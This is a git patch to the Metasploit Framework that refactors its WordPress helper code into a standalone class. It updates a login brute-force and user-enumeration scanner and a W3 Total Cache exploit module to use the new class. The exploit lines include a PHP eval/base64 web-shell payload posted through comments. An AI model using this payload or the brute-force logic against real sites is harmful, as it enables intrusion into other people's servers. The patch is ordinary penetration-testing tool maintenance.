From 009d8796f6f58407bbb5f720c1b575f21649c8d3 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <firefart@gmail.com>
Date: Thu, 22 Aug 2013 00:05:58 +0200
Subject: [PATCH] wordpress is now a module, not a mixin

---
 lib/http/wordpress.rb                         |  2 +
 .../wordpress/wordpress_base.rb}              | 47 +++++++++----------
 lib/msf/core/exploit/mixins.rb                |  1 -
 .../scanner/http/wordpress_login_enum.rb      | 15 +++---
 .../unix/webapp/php_wordpress_total_cache.rb  | 22 +++++----
 5 files changed, 46 insertions(+), 41 deletions(-)
 create mode 100644 lib/http/wordpress.rb
 rename lib/{msf/core/exploit/wordpress.rb => http/wordpress/wordpress_base.rb} (89%)

diff --git a/lib/http/wordpress.rb b/lib/http/wordpress.rb
new file mode 100644
index 0000000000..1662e720f4
--- /dev/null
+++ b/lib/http/wordpress.rb
@@ -0,0 +1,2 @@
+# -*- coding: binary -*-
+require 'http/wordpress/wordpress_base'
diff --git a/lib/msf/core/exploit/wordpress.rb b/lib/http/wordpress/wordpress_base.rb
similarity index 89%
rename from lib/msf/core/exploit/wordpress.rb
rename to lib/http/wordpress/wordpress_base.rb
index 3649f27fc5..d5b974dcbe 100644
--- a/lib/msf/core/exploit/wordpress.rb
+++ b/lib/http/wordpress/wordpress_base.rb
@@ -1,22 +1,19 @@
 # -*- coding: binary -*-
-module Msf
 
 ###
 #
 # This module provides a way of interacting with wordpress installations
 #
 ###
-	module Exploit::Remote::Wordpress
-		include Exploit::Remote::HttpClient
 
-		def initialize(info = {})
-			super
+module HTTP
+	class Wordpress
 
-			register_options(
-					[
-							OptString.new('TARGETURI', [true, 'The base path to the wordpress application', '/']),
-					], Exploit::Remote::Wordpress
-			)
+		# initializes a new Wordpress instance
+		#
+		# @param client The Metasploit module instance
+		def initialize(client)
+			@client = client
 		end
 
 		# Checks if the site is online and running wordpress
@@ -24,9 +21,9 @@ module Msf
 		# @return [Boolean] Returns true if the site is online and running wordpress
 		def wordpress_and_online?
 			begin
-				res = send_request_cgi({
+				res = @client.send_request_cgi({
 						'method' => 'GET',
-						'uri' => normalize_uri(target_uri)
+						'uri' => @client.normalize_uri(@client.target_uri)
 				}, 20)
 				if res and res.code == 200
 					if res.body =~ /["'][^"']*\/wp-content\/[^"']*["']/i or
@@ -39,7 +36,7 @@ module Msf
 				end
 			rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 			rescue ::Timeout::Error, ::Errno::EPIPE
-				print_error("Error connecting to #{target_uri}")
+				print_error("Error connecting to #{@client.target_uri}")
 				return false
 			end
 
@@ -50,7 +47,7 @@ module Msf
 		#
 		# @return [String] Wordpress Login URL
 		def wordpress_uri_login
-			normalize_uri(target_uri.path, 'wp-login.php')
+			@client.normalize_uri(@client.target_uri.path, 'wp-login.php')
 		end
 
 		# Returns the Wordpress Post URL
@@ -58,7 +55,7 @@ module Msf
 		# @param post_id Post ID
 		# @return [String] Wordpress Post URL
 		def wordpress_url_post(post_id)
-			normalize_uri(target_uri.path) + "/?p=#{post_id}"
+			@client.normalize_uri(@client.target_uri.path) + "/?p=#{post_id}"
 		end
 
 		# Returns the Wordpress Author URL
@@ -66,7 +63,7 @@ module Msf
 		# @param author_id Author ID
 		# @return [String] Wordpress Author URL
 		def wordpress_url_author(author_id)
-			normalize_uri(target_uri.path) + "/?author=#{author_id}"
+			@client.normalize_uri(@client.target_uri.path) + "/?author=#{author_id}"
 		end
 
 		# performs a wordpress login
@@ -75,8 +72,8 @@ module Msf
 		# @param pass Password
 		# @return [String] the session cookie on successful login, nil otherwise
 		def wordpress_login(user, pass)
-			redirect = "#{target_uri}#{Rex::Text.rand_text_alpha(8)}"
-			res = send_request_cgi({
+			redirect = "#{@client.target_uri}#{Rex::Text.rand_text_alpha(8)}"
+			res = @client.send_request_cgi({
 					'method' => 'POST',
 					'uri' => wordpress_uri_login,
 					'data' => wordpress_helper_login_post_data(user, pass, redirect),
@@ -97,7 +94,7 @@ module Msf
 		# @param user Username
 		# @return [Boolean] true if the user exists
 		def wordpress_user_exists?(user)
-			res = send_request_cgi({
+			res = @client.send_request_cgi({
 					'method' => 'POST',
 					'uri' => wordpress_uri_login,
 					'data' => wordpress_helper_login_post_data(user, 'x'),
@@ -121,7 +118,7 @@ module Msf
 		# @return [String] the Username if it exists, nil otherwise
 		def wordpress_userid_exists?(user_id)
 			url = wordpress_url_author(user_id)
-			res = send_request_cgi({
+			res = @client.send_request_cgi({
 					'method' => 'GET',
 					'uri' => url
 			})
@@ -133,14 +130,14 @@ module Msf
 					return $1
 				end
 				uri = "#{uri.path}?#{uri.query}"
-				res = send_request_cgi({
+				res = @client.send_request_cgi({
 						'method' => 'GET',
 						'uri' => uri
 				})
 			end
 
 			if res.nil?
-				print_error("#{target_uri} - Error getting response.")
+				print_error("#{@client.target_uri} - Error getting response.")
 			elsif res.code == 200 and
 					(res.body =~ /href="http[s]*:\/\/.*\/\?*author.+title="([[:print:]]+)" /i or
 					res.body =~ /<body class="archive author author-(?:[^\s]+) author-(?:\d+)/i)
@@ -235,12 +232,12 @@ module Msf
 			}) unless login_cookie
 
 			options = {
-					'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'),
+					'uri' => @client.normalize_uri(@client.target_uri.path, 'wp-comments-post.php'),
 					'method' => 'POST'
 			}
 			options.merge!({'vars_post' => vars_post})
 			options.merge!({'cookie' => login_cookie}) if login_cookie
-			res = send_request_cgi(options)
+			res = @client.send_request_cgi(options)
 			if res and res.code == 302
 				location = URI(res.headers['Location'])
 				return location
@@ -276,7 +273,7 @@ module Msf
 					'uri' => uri
 			}
 			options.merge!({'cookie' => login_cookie}) if login_cookie
-			res = send_request_cgi(options)
+			res = @client.send_request_cgi(options)
 			# post exists
 			if res and res.code == 200
 				# also check if comments are enabled
diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
index 2ec5c07c51..069adb32ed 100644
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -95,4 +95,3 @@ require 'msf/core/exploit/winrm'
 
 # WebApp
 require 'msf/core/exploit/web'
-require 'msf/core/exploit/wordpress'
diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb
index b9e594ed66..99dc13d545 100644
--- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb
+++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb
@@ -5,9 +5,10 @@
 #   http://metasploit.com/
 ##
 
-class Metasploit3 < Msf::Auxiliary
+require 'http/wordpress'
 
-	include Msf::Exploit::Remote::Wordpress
+class Metasploit3 < Msf::Auxiliary
+	include Msf::Exploit::Remote::HttpClient
 	include Msf::Auxiliary::AuthBrute
 	include Msf::Auxiliary::Report
 	include Msf::Auxiliary::Scanner
@@ -35,6 +36,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		register_options(
 			[
+				OptString.new('TARGETURI', [true, 'The base path to the wordpress application', '/']),
 				OptBool.new('VALIDATE_USERS', [ true, 'Validate usernames', true ]),
 				OptBool.new('BRUTEFORCE', [ true, 'Perform brute force authentication', true ]),
 				OptBool.new('ENUMERATE_USERNAMES', [ true, 'Enumerate usernames', true ]),
@@ -45,8 +47,9 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run_host(ip)
+		@wordpress = HTTP::Wordpress.new(self)
 
-		unless wordpress_and_online?
+		unless @wordpress.wordpress_and_online?
 			fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
 		end
 
@@ -102,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
 	def do_enum(user=nil)
 		print_status("#{target_uri} - WordPress Enumeration - Checking Username:'#{user}'")
 
-		exists = wordpress_user_exists?(user)
+		exists = @wordpress.wordpress_user_exists?(user)
 		if exists
 			print_good("#{target_uri} - WordPress Enumeration- Username: '#{user}' - is VALID")
 			report_auth_info(
@@ -125,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary
 	def do_login(user=nil, pass=nil)
 		vprint_status("#{target_uri} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'")
 
-		cookie = wordpress_login(user, pass)
+		cookie = @wordpress.wordpress_login(user, pass)
 
 		if cookie
 			print_good("#{target_uri} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'")
@@ -148,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary
 	def enum_usernames
 		usernames = []
 		for i in datastore['RANGE_START']..datastore['RANGE_END']
-			username = wordpress_userid_exists?(i)
+			username = @wordpress.wordpress_userid_exists?(i)
 			if username
 				print_good "#{target_uri} - Found user '#{username}' with id #{i.to_s}"
 				usernames << username
diff --git a/modules/exploits/unix/webapp/php_wordpress_total_cache.rb b/modules/exploits/unix/webapp/php_wordpress_total_cache.rb
index 63de5754d2..17e8cc55d9 100644
--- a/modules/exploits/unix/webapp/php_wordpress_total_cache.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_total_cache.rb
@@ -5,12 +5,12 @@
 #   http://metasploit.com/
 ##
 
-require 'msf/core'
+require 'http/wordpress'
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
+	include Msf::Exploit::Remote::HttpClient
 
-	include Msf::Exploit::Remote::Wordpress
+	Rank = ExcellentRanking
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -57,6 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 			register_options(
 				[
+					OptString.new('TARGETURI', [true, 'The base path to the wordpress application', '/']),
 					OptInt.new('POSTID', [ false, "The post ID where publish the comment" ]),
 					OptString.new('USERNAME', [ false,  "The user to authenticate as (anonymous if username not provided)"]),
 					OptString.new('PASSWORD', [ false,  "The password to authenticate with (anonymous if password not provided)" ])
@@ -82,9 +83,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		php_payload = "<!--mfunc if (sha1($_SERVER[HTTP_SUM]) == '#{@sum}' ) { eval(base64_decode($_SERVER[HTTP_CMD])); } --><!--/mfunc-->"
 
 		if @auth
-			uri = wordpress_post_comment_auth(php_payload, @post_id, @cookie)
+			uri = @wordpress.wordpress_post_comment_auth(php_payload, @post_id, @cookie)
 		else
-			uri = wordpress_post_comment_no_auth(php_payload,
+			uri = @wordpress.wordpress_post_comment_no_auth(php_payload,
 					@post_id,
 					rand_text_alpha(8),
 					"#{rand_text_alpha(3)}@#{rand_text_alpha(3)}.com",
@@ -95,8 +96,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
+		@wordpress = HTTP::Wordpress.new(self)
 
-		unless wordpress_and_online?
+		unless @wordpress.wordpress_and_online?
 			fail_with(Failure::NoTarget, "#{peer} does not seeem to be Wordpress site")
 		end
 
@@ -104,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		if @auth
 			print_status("#{peer} - Trying to login...")
-			@cookie = wordpress_login(@user, @password)
+			@cookie = @wordpress.wordpress_login(@user, @password)
 			if @cookie.nil?
 				fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful")
 			end
@@ -117,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status("#{peer} - Using the user supplied POST ID #{@post_id}...")
 		else
 			print_status("#{peer} - Trying to brute force a valid POST ID...")
-			@post_id = wordpress_get_valid_post_id_with_comments_enabled
+			@post_id = @wordpress.wordpress_get_valid_post_id_with_comments_enabled
 			if @post_id.nil?
 				fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment")
 			else
@@ -151,7 +153,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		unless wordpress_and_online?
+		@wordpress = HTTP::Wordpress.new(self)
+
+		unless @wordpress.wordpress_and_online?
 			print_error("#{peer} does not seeem to be Wordpress site")
 			return Exploit::CheckCode::Unknown
 		end